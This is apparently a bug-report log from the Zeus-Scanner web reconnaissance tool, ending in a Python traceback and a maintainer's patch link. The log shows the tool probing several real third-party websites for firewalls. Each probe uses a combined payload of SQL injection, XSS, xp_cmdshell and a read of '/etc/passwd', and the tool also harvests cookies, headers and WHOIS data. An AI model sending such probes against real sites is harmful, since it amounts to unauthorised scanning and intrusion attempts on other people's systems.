2017-11-13 13:07:40,886;zeus-log;DEBUG;fetched {'Upgrade': 'h2,h2c', 'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'aeb17bef165788b38a4c1f68893d7cc5=78d1e67d794adae5594be0992294cad7; path=/, lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/, jfcookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/, jfcookie[lang]=en; expires=Tue, 14-Nov-2017 19:07:40 GMT; Max-Age=86400; path=/', 'Expires': 'Mon, 1 Jan 2001 00:00:00 GMT', 'Vary': 'Accept-Encoding', 'Keep-Alive': 'timeout=2, max=1000', 'Server': 'Apache', 'Last-Modified': 'Mon, 13 Nov 2017 19:07:40 GMT', 'Connection': 'Upgrade, Keep-Alive', 'Pragma': 'no-cache', 'Cache-Control': 'post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:07:40 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:07:40,887;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.rotwand.com-headers.json'...
2017-11-13 13:07:40,888;zeus-log;INFO;performing WhoIs lookup on given domain 'www.rotwand.com'...
2017-11-13 13:07:41,844;zeus-log;INFO;discovered raw information...
2017-11-13 13:07:41,845;zeus-log;INFO;gathering interesting information...
2017-11-13 13:07:41,846;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.rotwand.com-whois.json'...
2017-11-13 13:07:41,846;zeus-log;INFO;checking URL headers...
2017-11-13 13:07:41,847;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:07:41,847;zeus-log;DEBUG;attempting connection to 'https://medworm.com/index.php?rid=274925288&cid=c_245_61_f&fid=40913&url=http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0168994 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:07:52,899;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:07:52,900;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:07:52,900;zeus-log;DEBUG;loading XML data...
2017-11-13 13:07:52,900;zeus-log;INFO;attempting to get request headers for 'https://medworm.com/index.php?rid=274925288&cid=c_245_61_f&fid=40913&url=http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0168994'...
2017-11-13 13:08:04,935;zeus-log;ERROR;unable to retrieve headers for site 'https://medworm.com/index.php?rid=274925288&cid=c_245_61_f&fid=40913&url=http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0168994'...
2017-11-13 13:08:04,936;zeus-log;INFO;performing WhoIs lookup on given domain 'medworm.com'...
2017-11-13 13:08:06,240;zeus-log;INFO;discovered raw information...
2017-11-13 13:08:06,241;zeus-log;INFO;gathering interesting information...
2017-11-13 13:08:06,243;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/medworm.com-whois.json'...
2017-11-13 13:08:06,243;zeus-log;INFO;checking URL headers...
2017-11-13 13:08:06,244;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:08:06,244;zeus-log;DEBUG;attempting connection to 'http://www.prisonobservatory.org/index.php?option=com_content&view=article&id=10:prison-conditions-in-italy&catid=13&Itemid=116 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:08:06,732;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:08:06,732;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:08:06,732;zeus-log;DEBUG;loading XML data...
2017-11-13 13:08:06,732;zeus-log;INFO;attempting to get request headers for 'http://www.prisonobservatory.org/index.php?option=com_content&view=article&id=10:prison-conditions-in-italy&catid=13&Itemid=116'...
2017-11-13 13:08:08,681;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:08:08,682;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.prisonobservatory.org-cookie.log'...
2017-11-13 13:08:08,683;zeus-log;DEBUG;fetched {'Content-Length': '106503', 'X-Powered-By': 'ASP.NET', 'Set-Cookie': 'ee1357310a2a758d9ed5eda6a676b839=4b19tm7o47p4305r80avn1gvq7; path=/', 'Server': 'Microsoft-IIS/8.5', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', 'Date': 'Mon, 13 Nov 2017 19:08:07 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:08:08,683;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.prisonobservatory.org-headers.json'...
2017-11-13 13:08:08,684;zeus-log;INFO;performing WhoIs lookup on given domain 'www.prisonobservatory.org'...
2017-11-13 13:08:09,133;zeus-log;INFO;discovered raw information...
2017-11-13 13:08:09,134;zeus-log;INFO;gathering interesting information...
2017-11-13 13:08:09,135;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.prisonobservatory.org-whois.json'...
2017-11-13 13:08:09,136;zeus-log;INFO;checking URL headers...
2017-11-13 13:08:09,136;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:08:09,136;zeus-log;DEBUG;attempting connection to 'http://empoweringfamilies.net/56/index.php?option=com_weblinks&task=view&catid=19&id=10 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:08:09,399;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'ModSecurity: Open Source Web Application Firewall (Trustwave)'...
2017-11-13 13:08:09,400;zeus-log;DEBUG;loading XML data...
2017-11-13 13:08:09,401;zeus-log;INFO;attempting to get request headers for 'http://empoweringfamilies.net/56/index.php?option=com_weblinks&task=view&catid=19&id=10'...
2017-11-13 13:08:11,711;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:08:11,712;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/empoweringfamilies.net-cookie.log'...
2017-11-13 13:08:11,713;zeus-log;DEBUG;fetched {'X-Content-Type-Options': 'nosniff', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'fdp_session=ebrohecfk38r153sgqim5qi2u0; expires=Mon, 13-Nov-2017 23:08:10 GMT; Max-Age=14400; path=/, fdp_session=ebrohecfk38r153sgqim5qi2u0; expires=Mon, 13-Nov-2017 23:08:10 GMT; Max-Age=14400; path=/', 'Expires': 'Thu, 19 Nov 1981 08:52:00 GMT', 'Server': 'Apache', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:08:10 GMT', 'Content-Type': 'text/html; charset=UTF-8'}...
2017-11-13 13:08:11,713;zeus-log;WARNING;provided target has protection against MIME type attacks...
2017-11-13 13:08:11,714;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/empoweringfamilies.net-headers.json'...
2017-11-13 13:08:11,714;zeus-log;INFO;performing WhoIs lookup on given domain 'empoweringfamilies.net'...
2017-11-13 13:08:12,674;zeus-log;INFO;discovered raw information...
2017-11-13 13:08:12,675;zeus-log;INFO;gathering interesting information...
2017-11-13 13:08:12,676;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/empoweringfamilies.net-whois.json'...
2017-11-13 13:08:12,676;zeus-log;INFO;checking URL headers...
2017-11-13 13:08:12,677;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:08:12,677;zeus-log;DEBUG;attempting connection to 'http://www.kithirlevel.hu/k.php?k=21215&s=1&h=w AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:08:21,690;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:08:21,690;zeus-log;DEBUG;loading XML data...
2017-11-13 13:08:21,691;zeus-log;INFO;attempting to get request headers for 'http://www.kithirlevel.hu/k.php?k=21215&s=1&h=w'...
2017-11-13 13:08:30,212;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:08:30,213;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.kithirlevel.hu-cookie.log'...
2017-11-13 13:08:30,213;zeus-log;DEBUG;fetched {'X-XSS-Protection': '1; mode=block', 'Content-Disposition': 'inline; filename=journal.pone.0179334.pdf', 'X-Content-Type-Options': 'nosniff', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'plos-device-detected=desktop; path=/; domain=.journals.plos.org; expires=Mon, 13-Nov-2017 21:08:22 GMT', 'Expires': '0', 'Keep-Alive': 'timeout=5, max=100', 'Server': 'Apache-Coyote/1.1', 'Last-Modified': 'Thu, 22 Jun 2017 17:34:19 GMT', 'Connection': 'Keep-Alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, max-age=0, must-revalidate', 'Date': 'Mon, 13 Nov 2017 19:08:26 GMT', 'X-Frame-Options': 'DENY', 'Content-Type': 'application/pdf'}...
2017-11-13 13:08:30,213;zeus-log;WARNING;provided target has protection against MIME type attacks...
2017-11-13 13:08:30,214;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:08:30,214;zeus-log;WARNING;provided target has protection against XSS attacks...
2017-11-13 13:08:30,215;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.kithirlevel.hu-headers.json'...
2017-11-13 13:08:30,215;zeus-log;INFO;performing WhoIs lookup on given domain 'www.kithirlevel.hu'...
2017-11-13 13:08:30,997;zeus-log;INFO;discovered raw information...
2017-11-13 13:08:30,997;zeus-log;INFO;gathering interesting information...
2017-11-13 13:08:30,999;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.kithirlevel.hu-whois.json'...
2017-11-13 13:08:31,000;zeus-log;INFO;checking URL headers...
2017-11-13 13:08:31,000;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:08:31,000;zeus-log;DEBUG;attempting connection to 'http://akd.apnstatic.com/media/html/sr/en/terms.html AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:08:31,327;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:08:31,328;zeus-log;DEBUG;loading XML data...
2017-11-13 13:08:31,329;zeus-log;INFO;attempting to get request headers for 'http://akd.apnstatic.com/media/html/sr/en/terms.html'...
2017-11-13 13:08:31,465;zeus-log;DEBUG;fetched {'Content-Length': '189', 'Content-Encoding': 'gzip', 'Vary': 'Accept-Encoding', 'Server': 'Apache', 'Connection': 'keep-alive', 'Cache-Control': 'max-age=31536000', 'Date': 'Mon, 13 Nov 2017 19:08:31 GMT', 'Content-Type': 'text/html; charset=iso-8859-1'}...
2017-11-13 13:08:31,467;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/akd.apnstatic.com(1).json'...
2017-11-13 13:08:31,467;zeus-log;INFO;performing WhoIs lookup on given domain 'akd.apnstatic.com'...
2017-11-13 13:08:31,916;zeus-log;INFO;discovered raw information...
2017-11-13 13:08:31,917;zeus-log;INFO;gathering interesting information...
2017-11-13 13:08:31,919;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/akd.apnstatic.com(1).json'...
2017-11-13 13:08:31,919;zeus-log;INFO;checking URL headers...
2017-11-13 13:08:31,919;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:08:31,920;zeus-log;DEBUG;attempting connection to 'https://vk.com/away.php?to=http%3A%2F%2Fgoo.gl%2Fh10CQC&post=-78554274_2135&cc_key= AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:08:33,348;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:08:33,349;zeus-log;DEBUG;loading XML data...
2017-11-13 13:08:33,350;zeus-log;INFO;attempting to get request headers for 'https://vk.com/away.php?to=http%3A%2F%2Fgoo.gl%2Fh10CQC&post=-78554274_2135&cc_key='...
2017-11-13 13:08:34,548;zeus-log;DEBUG;fetched {'Content-Length': '246', 'X-Powered-By': 'PHP/3.14080', 'Set-Cookie': 'remixsec_redir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com, remixsec_redir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=away.vk.com, remixsec_redir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/', 'Content-Encoding': 'gzip', 'Server': 'nginx', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 'Cache-control': 'no-store', 'Date': 'Mon, 13 Nov 2017 19:08:34 GMT', 'Content-Type': 'text/html; charset=windows-1251'}...
2017-11-13 13:08:34,550;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/vk.com-headers.json'...
2017-11-13 13:08:34,550;zeus-log;INFO;performing WhoIs lookup on given domain 'vk.com'...
2017-11-13 13:08:35,635;zeus-log;INFO;discovered raw information...
2017-11-13 13:08:35,636;zeus-log;INFO;gathering interesting information...
2017-11-13 13:08:35,639;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/vk.com-whois.json'...
2017-11-13 13:08:35,639;zeus-log;INFO;checking URL headers...
2017-11-13 13:08:35,639;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:08:35,639;zeus-log;DEBUG;attempting connection to 'http://php.net/manual/en/function.ereg-replace.php AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:08:35,847;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:08:35,847;zeus-log;DEBUG;loading XML data...
2017-11-13 13:08:35,848;zeus-log;INFO;attempting to get request headers for 'http://php.net/manual/en/function.ereg-replace.php'...
2017-11-13 13:08:36,005;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:08:36,006;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/php.net-cookie.log'...
2017-11-13 13:08:36,007;zeus-log;DEBUG;fetched {'Status': '404 Not Found', 'Content-Length': '3074', 'Content-language': 'en', 'X-Powered-By': 'PHP/5.6.30-0+deb8u1', 'Set-Cookie': 'LAST_LANG=en; expires=Tue, 13-Nov-2018 19:08:35 GMT; Max-Age=31536000; path=/; domain=.php.net, COUNTRY=NA%2C2600%3A8803%3Ab800%3A8680%3Af08c%3A5d71%3A964b%3Ac32c; expires=Mon, 20-Nov-2017 19:08:35 GMT; Max-Age=604800; path=/; domain=.php.net', 'Content-Encoding': 'gzip', 'Vary': 'Accept-Encoding', 'X-PHP-Load': '2.63, 2.54, 2.6', 'Server': 'nginx/1.6.2', 'Connection': 'keep-alive', 'Date': 'Mon, 13 Nov 2017 19:08:35 GMT', 'X-Frame-Options': 'SAMEORIGIN', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:08:36,007;zeus-log;WARNING;provided target has protection against clickjacking vulnerabilities...
2017-11-13 13:08:36,008;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/php.net-headers.json'...
2017-11-13 13:08:36,008;zeus-log;INFO;performing WhoIs lookup on given domain 'php.net'...
2017-11-13 13:08:36,872;zeus-log;INFO;discovered raw information...
2017-11-13 13:08:36,872;zeus-log;INFO;gathering interesting information...
2017-11-13 13:08:36,874;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/php.net-whois.json'...
2017-11-13 13:08:36,875;zeus-log;INFO;checking URL headers...
2017-11-13 13:08:36,875;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:08:36,875;zeus-log;DEBUG;attempting connection to 'http://www.apfnet.cn/index.php?option=com_content&view=article&id=10&Itemid=103 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:08:38,925;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:08:38,926;zeus-log;DEBUG;loading XML data...
2017-11-13 13:08:38,926;zeus-log;INFO;attempting to get request headers for 'http://www.apfnet.cn/index.php?option=com_content&view=article&id=10&Itemid=103'...
2017-11-13 13:08:40,512;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:08:40,512;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.apfnet.cn-cookie.log'...
2017-11-13 13:08:40,512;zeus-log;DEBUG;fetched {'X-Powered-By': 'PHP/5.4.41', 'Transfer-Encoding': 'chunked', 'Set-Cookie': '9fb8a556c456b5aef641ca94b352f1f0=a6523a8128d3431c25f07f700c7f7ab2; path=/', 'Server': 'Apache/2.2.15', 'Connection': 'close', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', 'Date': 'Mon, 13 Nov 2017 19:10:38 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:08:40,513;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.apfnet.cn-headers.json'...
2017-11-13 13:08:40,513;zeus-log;INFO;performing WhoIs lookup on given domain 'www.apfnet.cn'...
2017-11-13 13:08:41,484;zeus-log;ERROR;Zeus has hit an unexpected error and cannot continue, error code 'HTTP Error 500: Internal Server Error'...
Traceback (most recent call last):
  File "zeus.py", line 374, in <module>
    __run_attacks_main()
  File "zeus.py", line 299, in __run_attacks_main
    threads=opt.amountOfThreads
  File "/home/baal/bin/python/zeus-scanner/lib/core/settings.py", line 1011, in run_attacks
    url, verbose=verbose, timeout=timeout
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/whois_lookup/whois.py", line 104, in whois_lookup_main
    raw_information = gather_raw_whois_info(domain)
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/whois_lookup/whois.py", line 45, in gather_raw_whois_info
    data = urllib2.urlopen(request).read()
  File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 435, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 548, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 473, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 556, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 500: Internal Server Error

2017-11-13 13:23:46,835;zeus-log;INFO;Zeus got an unexpected error and will automatically create an issue for this error, please wait...
2017-11-13 13:23:46,835;zeus-log;INFO;getting authorization...
2017-11-13 13:23:46,858;zeus-log;INFO;extracting traceback from log file...
2017-11-13 13:23:46,859;zeus-log;INFO;attempting to get firefox browser version...

[Ekultek]

patched via https://github.com/Ekultek/Zeus-Scanner/commit/ef97ce70946fc5f5f327a4379faee51cc3fc67f0